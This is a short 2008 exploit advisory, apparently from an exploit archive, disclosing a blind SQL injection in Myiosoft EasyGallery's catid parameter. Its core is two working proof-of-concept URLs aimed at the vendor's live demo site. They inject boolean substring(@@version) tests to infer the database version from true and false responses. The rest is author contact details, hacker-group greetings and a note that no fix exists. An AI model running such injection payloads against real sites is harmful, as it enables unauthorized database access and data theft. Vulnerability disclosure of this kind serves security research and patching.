Myiosoft easygallery (catid) Blind SQL Injection Vulnerability

2008-11-17 18:00:04

Myiosoft easygallery (catid) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com & www.TrYaG.cc

MaiL : [email protected]
___________________________________


script : http://myiosoft.com/?1.105.0.0

Demo :
_______
true & false

http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4 > false

http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5 > true






____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________


Im IRAQi | Im TrYaGi

#

Fixes

No fixes

In order to submit a new fix you need to be registered.